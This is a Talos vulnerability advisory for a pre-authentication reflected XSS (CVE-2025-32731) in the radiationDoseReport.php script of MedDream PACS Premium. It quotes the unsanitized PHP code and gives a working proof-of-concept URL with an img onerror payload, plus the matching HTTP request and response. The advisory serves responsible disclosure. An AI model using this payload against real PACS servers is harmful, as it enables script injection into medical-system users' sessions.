CVE-2025-32731
A reflected cross-site scripting (xss) vulnerability exists in the radiationDoseReport.php functionality of meddream MedDream PACS Premium 7.3.5.860. A specially crafted malicious url can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
MedDream PACS Premium 7.3.5.860
MedDream PACS Premium - https://meddream.com/products/meddream-pacs-server/
6.1 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE-79 - Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
MedDream PACS is a DICOM 3.0-compliant server for storing, managing, and retrieving medical images. It includes a web-based DICOM viewer and administration interface, with features like user access control, study forwarding, and multi-format image support.
A pre-authentication reflected cross-site scripting vulnerability exists in the functionality of the Pacs/radiationDoseReport.php script.
The value of the path parameter used in that script is written into the HTML output without any sanitization. The vulnerable code appears as follows:
Line 71 if (!isset($_GET['path']))
Line 72 die("Full path to the radiation dose report must be specified!");
Line 73 $dbcon = new MyConnection();
Line 74 $path = urldecode($_GET['path']);
Line 75 if (isset($_GET['verbose']))
Line 76 $verbose = $_GET['verbose'];
Line 77 }
Line 78 if (!file_exists($path)) {
Line 79 print "<p>File [$path] does not exist!";
Line 80 exit();
Line 81 }
The $path variable is set by the attacker and is fully controllable line 74. Next, if the file pointed by $path variable does not exist line 78, an error message is displayed in a form on html code line 79.
To trigger the vulnerability, an attacker might provide the victim with the following malicious url:
http://127.0.0.1/Pacs/radiationDoseReport.php?path=<img src="#" onerror="alert(1)" />
URL encoded:
http://127.0.0.1/Pacs/radiationDoseReport.php?path=%3cimg%20src%3d%22%23%22%20onerror%3d%22alert(1)%22%20%2f%3e
Example of a malicious request and response containing injected HTML/JavaScript code:
REQ
GET /Pacs/radiationDoseReport.php?path=%3cimg%20src%3d%22%23%22%20onerror%3d%22alert(1)%22%20%2f%3e HTTP/1.1
Host: 192.168.155.105
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: sessionCookie=%5C%09%C4%85%C5%8C%2Cj%D7%C0%BA%AAX%AF%E5h%EBYc%A3%EB%96E%92%20%A3%CD%CDe%1E%F9_; MEDDREAMSESSID=9CF70D2D0EE3A644BBBB1BF24385E66A; PHPSESSID=6d0c1af741ebfae0d05672ae6bf835a8
Upgrade-Insecure-Requests: 1
Priority: u=0, i
RESP
HTTP/1.1 200 OK
Date: Wed, 16 Apr 2025 15:56:19 GMT
Server: =^_^=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Powered-By: PHP/8.3.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=(), camera=()
Content-Length: 2532
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
(...)
<head><title>MedDream PACS - Radiation Dose Report</title></head><body><div class="contentBody"><p>File [<img src="#" onerror="alert(1)" />] does not exist!</div>
2025-04-29 - Initial Vendor Contact
2025-04-29 - Vendor Disclosure
2025-07-28 - Vendor Patch Release
2025-07-28 - Public Release
Discovered by Marcin 'Icewall' Noga of Cisco Talos.